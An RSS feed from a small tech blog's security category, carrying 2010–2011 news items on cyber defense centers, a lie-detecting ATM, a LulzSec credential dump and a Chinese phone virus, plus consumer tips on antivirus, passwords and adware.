<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Cyberphunkz Tech Blog &#187; Security</title>
	<atom:link href="http://techblog.cyberphunkz.com/category/security/feed/" rel="self" type="application/rss+xml" />
	<link>http://techblog.cyberphunkz.com</link>
	<description>Tech information that you never knew... Now at your fingertips</description>
	<lastBuildDate>Wed, 22 Jun 2011 18:18:07 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=</generator>
		<item>
		<title>Germany Launches Cyber Defense Center</title>
		<link>http://techblog.cyberphunkz.com/2011/06/22/germany-launches-cyber-defense-center/</link>
		<comments>http://techblog.cyberphunkz.com/2011/06/22/germany-launches-cyber-defense-center/#comments</comments>
		<pubDate>Wed, 22 Jun 2011 18:18:07 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Cyber defense]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/2011/06/22/germany-launches-cyber-defense-center/</guid>
		<description><![CDATA[Germany launched a national cyber defense center whose primary task will be to protect critical computer infrastructure from cyber attacks. The Nationale Cyber-Abwehrzentrum (National Cyber-Defense Center) is based in Bonn in the same building as the Federal Office for Information Security (BSI). For now, it has ten permanent employees and represents a joint effort between &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2011/06/22/germany-launches-cyber-defense-center/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>Germany launched a national cyber defense center whose primary task will be to protect critical computer infrastructure from cyber attacks.</p>
<p>The Nationale Cyber-Abwehrzentrum (National Cyber-Defense Center) is based in Bonn in the same building as the Federal Office for Information Security (BSI).</p>
<p>For now, it has ten permanent employees and represents a joint effort between the BSI, the Federal Office for Civil Protection and Disaster Assistance (BKK) and the Federal Office for Protection of the Constitution (BFV).</p>
<p>Other agencies, like the German Federal Police, the Federal Intelligence Service and the Armed Forces will join the effort in the upcoming months.</p>
<p>&#8220;At the heart of cyber-security is the protection of critical infrastructures,&#8221; said Federal Interior Minister Friedrich. Organizations and agencies with important significance for the community are part of this infrastructure.</p>
<p>&#8220;Stuxnet and the most recent example of the hacker attack on the French nuclear company EDF (Electricité de France) have shown that IT systems represent critical infrastructure in the context of cyber-attacks,&#8221; he added.</p>
<p>The Interior Ministry announced a sharp rise in cyber attacks against critical infrastructure last year, nearly doubling in number compared to 2009. China is seen a major player in this area.</p>
<p>&#8220;To successfully protect critical infrastructures against attacks, we focus on prevention, response and early warning. We have been doing this for several years in various ways within the federal government.</p>
<p>&#8220;However, the attacks are increasing in complexity and are exceeding the responsibility of individual authorities. Therefore, the establishing of the National Cyber-Defense Center is an important step for the advancement of cyber-security in Germany,&#8221; said BSI president and Cyber-Defense Center spokesperson Michael Hange.</p>
<p>Germany follows the lead of other countries that have already set up similar centers, like UK&#8217;s Cyber Security Operations Centre (CSOC) and the US Cyber Command. Countries like India or Estonia have also announced plans to set up cyber defense units.</p>
<p>Last month China launched a cyber defense program which aims to protect the country&#8217;s critical networks against cyber attacks and also to establish a cyber training program for army officers.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2011/06/22/germany-launches-cyber-defense-center/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Bank machine that sniffs out credit fraud</title>
		<link>http://techblog.cyberphunkz.com/2011/06/21/bank-machine-that-sniffs-out-credit-fraud/</link>
		<comments>http://techblog.cyberphunkz.com/2011/06/21/bank-machine-that-sniffs-out-credit-fraud/#comments</comments>
		<pubDate>Tue, 21 Jun 2011 01:56:28 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[hacking]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[atm]]></category>
		<category><![CDATA[bank]]></category>
		<category><![CDATA[KGB]]></category>
		<category><![CDATA[lie detector]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/2011/06/21/bank-machine-that-sniffs-out-credit-fraud/</guid>
		<description><![CDATA[MOSCOW &#8211; Russia&#8217;s biggest retail bank is testing something that the old K.G.B. might have loved, an automated teller machine with a built-in lie detector intended to prevent consumer credit fraud. New customers could talk to the machine to apply for a credit card, with no human intervention required on the bank&#8217;s end. The machine &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2011/06/21/bank-machine-that-sniffs-out-credit-fraud/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>MOSCOW &#8211; Russia&#8217;s biggest retail bank is testing something that the old K.G.B. might have loved, an automated teller machine with a built-in lie detector intended to prevent consumer credit fraud.</p>
<p>New customers could talk to the machine to apply for a credit card, with no human intervention required on the bank&#8217;s end.</p>
<p>The machine scans a passport, records fingerprints and takes a three-dimensional scan for facial recognition. And it uses voice-analysis software to help assess whether the person is truthfully answering questions that include &#8220;Are you employed?&#8221; and &#8220;At this moment, do you have any other outstanding loans?&#8221;</p>
<p>The voice-analysis system was developed by the Speech Technology Center, a company whose other big clients include the Federal Security Service &#8211; the Russian domestic intelligence agency descended from the Soviet K.G.B.</p>
<p>Dmitri V. Dyrmovsky, director of the center&#8217;s Moscow offices, said the new system was designed in part by sampling Russian law enforcement databases of recorded voices of people found to be lying during police interrogations.</p>
<p>The big bank involved, Sberbank, whose majority owner is the Russian government, said it intended to install the machines in malls and bank branches around the country, but had not yet scheduled the rollout. Technology consultants say it would be the banking world&#8217;s first use of voice analysis in automated teller machines.</p>
<p>It was the global financial crisis, partly prompted by loans that people could not or would not repay, that prompted Sberbank to tap Russia&#8217;s national security experts as it set out to automate banking activities, said Victor M. Orlovsky, a senior vice president for technology at the bank.</p>
<p>The software detects nervousness or emotional distress, possible indications that a credit applicant is dissembling. That information, Mr. Orlovsky said, would be used in combination with other data, including credit history.</p>
<p>Sberbank says that to comply with Russian privacy law, the bank plans to store customers&#8217; voice prints on chips contained in their credit cards rather than on a central database.</p>
<p>In addition, Mr. Orlovsky said the bank planned to make consumers aware of the types of information, including biometrics, that the machine would be collecting. But the technology center says even people who know about the voice-stress program would have trouble fooling it.</p>
<p>One of the center&#8217;s other products measures anger and is already installed at the telephone call center of the Russian national railways.</p>
<p>&#8220;We are not violating a client&#8217;s privacy,&#8221; Mr. Orlovsky said.</p>
<p>&#8220;We are not climbing into the client&#8217;s brain. We aren&#8217;t invading their personal lives. We are just trying to find out if they are telling the truth. I don&#8217;t see any reason to be alarmed.&#8221;</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2011/06/21/bank-machine-that-sniffs-out-credit-fraud/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>LulzSec discloses 62,000+ random login credentials</title>
		<link>http://techblog.cyberphunkz.com/2011/06/18/lulzsec-discloses-62000-random-login-credentials/</link>
		<comments>http://techblog.cyberphunkz.com/2011/06/18/lulzsec-discloses-62000-random-login-credentials/#comments</comments>
		<pubDate>Fri, 17 Jun 2011 19:20:33 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[lulzsec]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=616</guid>
		<description><![CDATA[LulzSec rampages on. They claimed they took out cia.gov for a couple of hours tonight, but its difficult to say whether they really did it or whether the site was made unavailable because of a large number of people trying to access it after seeing the &#8220;Tango down &#8211; cia.gov &#8211; for the lulz&#8221; message on &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2011/06/18/lulzsec-discloses-62000-random-login-credentials/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>LulzSec rampages on.</p>
<p>They claimed they took out <em>cia.gov</em> for a couple of hours tonight, but its difficult to say whether they really did it or whether the site was made unavailable because of a large number of people trying to access it after seeing the &#8220;Tango down &#8211; cia.gov &#8211; for the lulz&#8221; message on the group&#8217;s Twitter feed.</p>
<p>The group also redirected the incoming phone calls to their dedicated and likely untraceable phone line to online retailer Magnets.com, then the Detroit offices of the FBI, and finally to HBGary offices.</p>
<p>As the latest prank, they made available for download a text document containing 62,000+ emails/passwords and encouraged Internet users to try and use them on various online services and social networks in order to hijack the accounts.</p>
<p>&#8220;In return for flooding /b/ this morning, have 62,000 passwords and emails,&#8221; they said. &#8220;The top half is &#8216;password | email&#8217;, and the bottom half is &#8216;email | password&#8217;; these are random assortments from a collection, so don&#8217;t ask which site they&#8217;re from or how old they are, because we have no idea. We also can&#8217;t confirm what percentage still work, but be creative or something.&#8221;</p>
<p>And judging by the comments of various users, some rose to the challenge. The worst thing is, the file is hosted on MediaFire, and as I&#8217;m writing this, is still available for download.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2011/06/18/lulzsec-discloses-62000-random-login-credentials/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How Does AntiVirus Work</title>
		<link>http://techblog.cyberphunkz.com/2011/04/02/how-does-antivirus-work/</link>
		<comments>http://techblog.cyberphunkz.com/2011/04/02/how-does-antivirus-work/#comments</comments>
		<pubDate>Sat, 02 Apr 2011 03:32:52 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=612</guid>
		<description><![CDATA[The Antivirus is a Software that detect harmful Software&#8217;s or programs  like Computer Virus, Computer Worms, Trojan Horses, Spyware, Ad-ware. Antivirus are one of the most important part of a computer and save us from many dangers every day. But the Question arises that how do they work? The Antivirus Work in two main Ways: Signature &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2011/04/02/how-does-antivirus-work/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><a href="http://techblog.cyberphunkz.com/wp-content/uploads/2011/04/antivirus.jpg"><img class="alignleft size-full wp-image-613" title="antivirus" src="http://techblog.cyberphunkz.com/wp-content/uploads/2011/04/antivirus.jpg" alt="" width="200" height="139" /></a></p>
<div><span style="color: #000000;">The Antivirus is a Software that detect harmful Software&#8217;s or programs  like Computer Virus, Computer Worms, Trojan Horses, Spyware, Ad-ware. Antivirus are one of the most important part of a computer and save us from many dangers every day. But the Question arises that how do they work?</span></div>
<div></div>
<div></div>
<div></div>
<div></div>
<div></div>
<div><span style="color: #000000;"><strong><br />
</strong></span></div>
<div><span style="color: #000000;"><strong> </strong>The Antivirus Work in two main Ways:<br />
</span></div>
<ul>
<li><span style="color: #000000;">Signature based detection</span></li>
<li><span style="color: #000000;">Checking for Suspicious </span><span style="color: #000000;">Behavior</span></li>
<p><strong> </strong></ul>
<div style="text-align: center;"><span style="color: #0000ff;"><strong>Signature Based Detection</strong></span></div>
<div><strong><br />
</strong></div>
<div><span style="color: #000000;">The Signature Based Detection is the way in which the antivirus compare the content of the file to the dictionary of the viruses. This is a very effective way because it is able to identify all the viruses that are publicly known. The example of it is like this: If the file is like this 10101010 then the antivirus will compare it with dictionary, if it match&#8217;s the 10101010 in dictionary than it will be considered as virus. The effectiveness of this method depends on that the virus or Trojan is public if it is not that it may not be able to detect it. Some hacker uses Crypter software to hide the content of the file e.g 10101010 would become 12121212 now antivirus would not find it in Dictionary because it seems another file to dictionary but in reality the file would still be virus. To encounter with this problem Antivirus Dictionaries also include the entries to identify the Crypted Virus. For Example they would also keep 12121212 in Virus Signature and identify that as virus also.</span></div>
<div><strong><br />
</strong></div>
<div style="text-align: center;"><span style="color: #0000ff;"><strong>Suspicious </strong></span><span style="color: #0000ff;"><strong>Behavior</strong></span></div>
<div><span style="color: #000000;">This type include the antivirus running in the real time and observing the behaviour of the the files running. It sees that if the files are overwriting the data without users permission or notification. If this kind of behaviour is observed by the antivirus it will suddenly stop the program and ask the user about the reliability of the file. So User can choose the is it All right to let the program work or if it is a virus s(he) can stop it.</span></div>
<p>&nbsp;</p>
<div><span style="color: #0000ff;"><strong>Point To Be Consider</strong></span></div>
<p>&nbsp;</p>
<ul>
<li>
<div><span style="color: #000000;">As you have seen that normally the antivirus take the content or signature of a file or program to compare it with its database, now wha</span><span style="color: #000000;">t if the database of an antivirus is not updated and if any new malware try to exploit your computer and your antivirus don&#8217;t identify it because it has no information about. So the new threat can easily bypass your antivirus and will cause a harm to your comp</span><span style="color: #000000;">uter, this is called Zero-day threats.</span></div>
</li>
</ul>
<ul>
<li>
<div><span style="color: #000000;">Awareness among the user(s) is/are very important rather than antivirus software&#8217;s, you should teach your self on how to be safe on the jungle of web where every day, is the day of new threat.</span></div>
</li>
<li>
<div><span style="color: #000000;">You must be aware about the viruses and their effects and how they spread.</span></div>
<ul>
<li><span style="color: #000000;">Malware: Virus</span></li>
</ul>
</li>
<li>
<div><span style="color: #000000;">Do not download and run the unknown programs from Internet.</span></div>
</li>
<li>
<div><span style="color: #000000;">You should know how to secure yourself from malware.</span></div>
<ul>
<li><span style="color: #000000;">Secure Your Self From Keylogger </span></li>
</ul>
</li>
<li>
<div><span style="color: #000000;">You must know about the latest antivirus software for your operating system.</span></div>
<ul>
<li><span style="color: #000000;">4 Antivirus For Android </span></li>
</ul>
</li>
</ul>
<p><span style="color: #000000;">So these are two main ways employed by the antivirus to detect the unwanted files. So now always when you run a scan you would know what is happening.</span></p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2011/04/02/how-does-antivirus-work/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to make your password hacker-proof</title>
		<link>http://techblog.cyberphunkz.com/2011/02/14/how-to-make-your-password-hacker-proof/</link>
		<comments>http://techblog.cyberphunkz.com/2011/02/14/how-to-make-your-password-hacker-proof/#comments</comments>
		<pubDate>Mon, 14 Feb 2011 15:42:09 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=604</guid>
		<description><![CDATA[Passwords are the first line of defence in warding off online criminals. As web security breaches become more common, your online safety is being put at risk if your password is weak. Figures from GetSafeOnline.org, a joint initiative between the Government and the Serious Organised Crime Agency, showed that 15% of internet users fell victim to hackers in 2010. Managing director &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2011/02/14/how-to-make-your-password-hacker-proof/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>Passwords are the first line of defence in warding off online criminals. As web security breaches become more common, your online safety is being put at risk if your password is weak.</p>
<p>Figures from GetSafeOnline.org, a joint initiative between the Government and the Serious Organised Crime Agency, showed that 15% of internet users fell victim to hackers in 2010. Managing director Tony Neate warned: &#8220;A strong password is as critical to online security as having anti-virus software. Most web users choose weak combinations that are easy to guess &#8211; such as their favourite football team &#8211; and then recycle them for numerous different websites.&#8221;</p>
<p>To protect yourself simply and effectively, here are six tips to outsmart hackers by creating stronger passwords.</p>
<p><strong>1) Never use personal information</strong></p>
<p>Setting personal information as your password means that you are giving hackers an easy ride by making it too obvious. Be aware of using easy-to-crack passwords, like your own name, birth date, a pet&#8217;s name, mother&#8217;s maiden name or your favourite football team. Every word in the dictionary, names, and dates are the first things hackers try when trying to break a password. If you find it difficult to remember passwords which don&#8217;t contain a phrase or word in that is memorable to you, use it as a base password instead. For example, if you wanted to use &#8216;Guns N&#8217; Roses&#8217; song, &#8216;Sweet Child of Mine&#8217;, your base password might be &#8216;SCOM&#8217;. Remembering the password is a matter of singing yourself the song. Add on a few numbers and symbols too for extra protection.</p>
<p>Try not to use a dictionary password. This will help reduce the threat of your password being found by &#8216;dictionary&#8217; based tools which some attackers use.</p>
<p><strong>2) Use different passwords for different accounts</strong></p>
<p>The problem with using the same password for every site you use, whether it is for online banking or gaining access to a social network, is that if the password is compromised and someone finds out which websites you use the most, the rest of your identity is at risk.</p>
<p>It is advised to Internet users to use different passwords for websites, especially banking and financial ones. This reduces the threat of anyone using the same password to log into all of your services/accounts. According to Government statistics, 17% of people still use the same password for every site they access.</p>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-604"></span></p>
<p><strong>3) Use random number sequences</strong></p>
<p>Passwords should ideally contain a random combination of numbers alongside your chosen base letters and special characters. Media firm, Gawker, whose million-strong member&#8217;s database was hacked into in December, revealed their user&#8217;s most careless password habits. Those who were the most at risk of falling victim to hackers stupidly used the combination &#8217;123456&#8242; as their password.</p>
<p><strong>4) Use mixed character types</strong></p>
<p>Always use upper and lower case letters, numbers, and special characters like exclamation marks, hashes and asterisks where possible. &#8216;Bloomberg Businessweek&#8217; recently compiled data from a variety of cyber security experts, showing how long it takes for a hacker to randomly guess a password. The data found that any six character password consisting solely of letters can be cracked in just ten minutes but a nine character password complete with letters, uppercase, numbers and symbols will take 44,530 years to crack.</p>
<p>It also advised web users to substitute letters with numbers, e.g. &#8216;F1ow3r&#8217; instead of &#8216;flower&#8217;.</p>
<p><strong>5) Update your password regularly</strong></p>
<p>IT research and advisory company, Gartner inc. recommends that a user should change their password every 90 days to keep hackers guessing. Some banking and online trading sites give their users the opportunity to change their password at regular intervals.</p>
<p><strong>6) Use long passwords</strong></p>
<p>The more characters in a password, the harder it is to crack. Your password should ideally be between eight and 16 characters in length. Having at least eight characters is a good compromise between safety and usability.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2011/02/14/how-to-make-your-password-hacker-proof/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ten ways to Avoid Adware on your machine!</title>
		<link>http://techblog.cyberphunkz.com/2010/11/20/ten-ways-to-avoid-adware-on-your-machine/</link>
		<comments>http://techblog.cyberphunkz.com/2010/11/20/ten-ways-to-avoid-adware-on-your-machine/#comments</comments>
		<pubDate>Sat, 20 Nov 2010 04:43:16 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[How To?]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=598</guid>
		<description><![CDATA[Adware, malware, spyware and viruses can bring your machine to its knees. They are detrimental lowering the performance of computer. we may perhaps need to replace data. we can lose distinct files. Preserve the nasties away through the PC utilizing these ten effortless tips. 1. Use Firefox: Internet Explorer stands out as the most well-known &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/11/20/ten-ways-to-avoid-adware-on-your-machine/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>Adware, malware, spyware and viruses can bring your machine to its knees. They are detrimental lowering the performance of computer. we may perhaps need to  replace data. we can lose distinct files. Preserve the nasties away through the PC utilizing these ten effortless tips.<br />
1. Use Firefox: Internet Explorer stands out as the most well-known browser on over a market, controlling more than 50% in the industry share. The virus and adware creators in particular look for exploitable vulnerabilities inside IE due to the fact they know that they will receive the best return on investment. Your switch to Firefox prevents some adware from infecting your machine.</p>
<p>2. Download from identified sites ONLY: New websites for installing adware are popping up all of the time. In case you discover a thing that you just need to  download, make certain that it’s from a identified site. A company like Amazon Household of Wares could possibly be a smaller a smaller amount trustable. In case you aren’t certain regardless of whether you may trust a site, perform a quick search.</p>
<p>3. Scan your PC frequently: Sometimes adware programmers take a sneaky approach. They will set up their programs to run quietly during the background to spy upon your activities. This as soon as a week scan is necessary to remove any of those people sneaky bugs.</p>
<p>4. Install Adaware: Ad-Aware stands out as the most well-known cost-free adware removal process over a market. It detects, quarantines and removes adware. It searches for other programs which may perhaps have been installed, highlighting them in an effortless to use interface. This system doesn’t have an anti-virus attached.</p>
<p>5. Don’t click on unsolicited email: You will be continually receiving offers to increase this or increase that through unsolicited email. Your curiosity might be killing you, but don’t click on these emails. They accept your click as permission to install adware, spyware and malware on your PC.</p>
<p>6. Install Antivirus software: Installing two programs for virus and adware protection is a smart idea. It caters to the strengths of each program, increasing the overall strength of your antiadware and antiviral campaign. Some of the best antivirus software is free, providing real time protection. Programs to look at would be Avast Antivir and AVG.</p>
<p>7. Don’t install toolbars: Even some reputable sites install custom toolbars. They slow your system down and collect information about your surfing habits. While a toolbar might offer some perks, it may also diminish your experience by dragging your system to a halt. Toolbars from less reputable places install adware and sometimes infect your system outright.</p>
<p>8. Look at your task manager: If anything seems out of place with your computer, take a look at your task manager. This tells you about all of the programs and processes which are running on your computer. Examine the processes tab for anything which you don’t immediately recognize. Perform a web search for unfamiliar processes. Better more, use task managing softwares such as Process Explorer from Microsoft!</p>
<p>9. Do not click on popups: Clicking on a popup usually spells certain doom for your computer. It opens the door for the viruses and adware that want to infect your machine, telling these malicious applications to make themselves at home. Stay away from those constantly advertised screen savers and icons.</p>
<p>10. Trust your gut: If you don’t feel right about a site, don’t go there. If you are receiving warnings from the anti-virus and anti-adware programs which you’ve installed, don’t go there. If you don’t like the layout of a site, don’t go there. Trust your instincts about sites.</p>
<p>With proper vigilance, you can keep aggravating adware, spyware and malware from your machine. Trust your instincts. Install Ad-Aware and an antivirus program. The care you spend in preventing adware from infecting your machine can save money and time.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/11/20/ten-ways-to-avoid-adware-on-your-machine/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>&#8216;Zombie&#8217; virus haunts Chinese cell users</title>
		<link>http://techblog.cyberphunkz.com/2010/11/13/zombie-virus-haunts-chinese-cell-users/</link>
		<comments>http://techblog.cyberphunkz.com/2010/11/13/zombie-virus-haunts-chinese-cell-users/#comments</comments>
		<pubDate>Sat, 13 Nov 2010 14:50:21 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[china]]></category>
		<category><![CDATA[zombie]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=595</guid>
		<description><![CDATA[By Xu Chi 2010-11-10 http://www.shanghaidaily.com/article/?id=454146&#38;type=Metro Shanghai &#8211; WATCH out! &#8220;Zombies&#8221; are attacking hundreds of thousands of mobile phones in the city. The zombies are not the scary kind, but they do qualify as annoying as at least 300,000 local handset users are unwittingly sending spam messages with a virus to all contacts in their address &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/11/13/zombie-virus-haunts-chinese-cell-users/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>By Xu Chi</p>
<p>2010-11-10</p>
<p><a href="http://www.shanghaidaily.com/article/?id=454146&amp;type=Metro" target="_blank">http://www.shanghaidaily.com/article/?id=454146&amp;type=Metro</a></p>
<p>Shanghai &#8211; WATCH out! &#8220;Zombies&#8221; are attacking hundreds of thousands of mobile phones in the city.</p>
<p>The zombies are not the scary kind, but they do qualify as annoying as at least 300,000 local handset users are unwittingly sending spam messages with a virus to all contacts in their address books after their phones caught the Zombie virus, said NetQin Mobile Inc, a leading mobile phone security company.</p>
<p>The number accounted for 20 percent of the 1.5 million mobile phones across the country that have been infected by the virus so far, making Shanghai one of the hardest-hit areas, the Beijing-based company found.</p>
<p>A local lawyer, Liu Chunquan, said if the hackers who created the virus are caught they will be jailed for creating and spreading a virus and damaging computer systems.</p>
<p>According to the country&#8217;s criminal law, offenders can be jailed for more than five years if their crimes lead to severe consequences.</p>
<p>Anti-virus experts suggested that mobile phone users install anti-virus software and avoid clicking the links of spam messages, even those from friends or relatives.</p>
<p>Cell phones infected by the virus will be turned into another &#8220;zombie&#8221; phone, sending the phone user&#8217;s SIM card information to hackers, who then remotely control the phone to send links of the virus to others via spam text messages.</p>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-595"></span></p>
<p>Users who receive the messages and click the links will also be infected while the infected phones keep sending spam messages. The virus has cost handset users a total of about 2 million yuan (US$300,000) per day.</p>
<p>&#8220;My friend complained that he constantly received ad messages from me, but I never sent him any,&#8221; said a local resident surnamed Zhang. &#8220;Then I realized that my phone was turned into a &#8216;zombie.&#8217;&#8221;</p>
<p>According to a NetQin official surnamed Dong, they have studied hundreds of thousands of complaints and emergency calls, the feedback of the security software installed on mobile phones, and the information they gathered from a massive database that users had joined voluntarily.</p>
<p>However, the number of victims may far exceed the figures given by the company as its statistics don&#8217;t cover all phone users.</p>
<p>The virus infected 1 million users during the first week of September, according to a previous report by the National Computer Network Emergency Response Technical Team Center.</p>
<p>&#8220;We noticed the virus in early August and our engineers started to fight back with anti-virus software,&#8221; said Dong. &#8220;It&#8217;s possible to stop it from spreading quickly.&#8221;</p>
<p>But she said they also needed government help to track down the hackers.</p>
<p>Also read -</p>
<p><a href="http://www.informationweek.com/news/security/attacks/showArticle.jhtml?articleID=228200648&amp;cid=RSSfeed_IWK_Security" target="_blank">http://www.informationweek.com/news/security/attacks/showArticle.jhtml?articleID=228200648&amp;cid=RSSfeed_IWK_Security</a></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/11/13/zombie-virus-haunts-chinese-cell-users/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Facebook adds hacker tracker tool</title>
		<link>http://techblog.cyberphunkz.com/2010/09/06/facebook-adds-hacker-tracker-tool/</link>
		<comments>http://techblog.cyberphunkz.com/2010/09/06/facebook-adds-hacker-tracker-tool/#comments</comments>
		<pubDate>Mon, 06 Sep 2010 16:58:01 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[facebook]]></category>
		<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=592</guid>
		<description><![CDATA[3 Sep 2010 http://www.pcpro.co.uk/news/security/360865/facebook-adds-hacker-tracker-tool Facebook says it has improved its security with a remote log-in management tool that should help users tell if their accounts have been hacked. The primary use for the new tool, currently being rolled out and available via the Account Security section of Account Settings, will be as a remote log-out &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/09/06/facebook-adds-hacker-tracker-tool/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>3 Sep 2010</p>
<p><a href="http://www.pcpro.co.uk/news/security/360865/facebook-adds-hacker-tracker-tool" target="_blank">http://www.pcpro.co.uk/news/security/360865/facebook-adds-hacker-tracker-tool</a></p>
<p>Facebook says it has improved its security with a remote log-in management tool that should help users tell if their accounts have been hacked.</p>
<p>The primary use for the new tool, currently being rolled out and available via the Account Security section of Account Settings, will be as a remote log-out facility for people that have forgotten to sign off when they have been using a public or friend&#8217;s computer.</p>
<p>However, Facebook said the tool would also be useful in monitoring accounts if they had been hacked and give users the option to kick the hackers out of their accounts and change the password.</p>
<p>“If someone accesses your account without your permission, you can shut down the unauthorised login before resetting your password and taking other steps to secure your account and computer,” the company said on the Facebook blog.</p>
<p>Within the tool, Facebook said, “you’ll see all of your active sessions along with information about each one. That information includes the log-in time, device name if you’ve previously named it through our log-in notifications feature, the approximate location of the log in based on IP address, and browser and operating system.”</p>
<p>Critics have claimed the new tool will only be used by the technically savvy, leaving the majority of users no better off.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/09/06/facebook-adds-hacker-tracker-tool/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Russian Spies used Wi-Fi and Steganography</title>
		<link>http://techblog.cyberphunkz.com/2010/06/22/russian-spies-used-wi-fi-and-steganography/</link>
		<comments>http://techblog.cyberphunkz.com/2010/06/22/russian-spies-used-wi-fi-and-steganography/#comments</comments>
		<pubDate>Tue, 22 Jun 2010 06:15:56 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[hacking]]></category>
		<category><![CDATA[laptop]]></category>
		<category><![CDATA[Military]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[russia]]></category>
		<category><![CDATA[spies]]></category>
		<category><![CDATA[usa]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=586</guid>
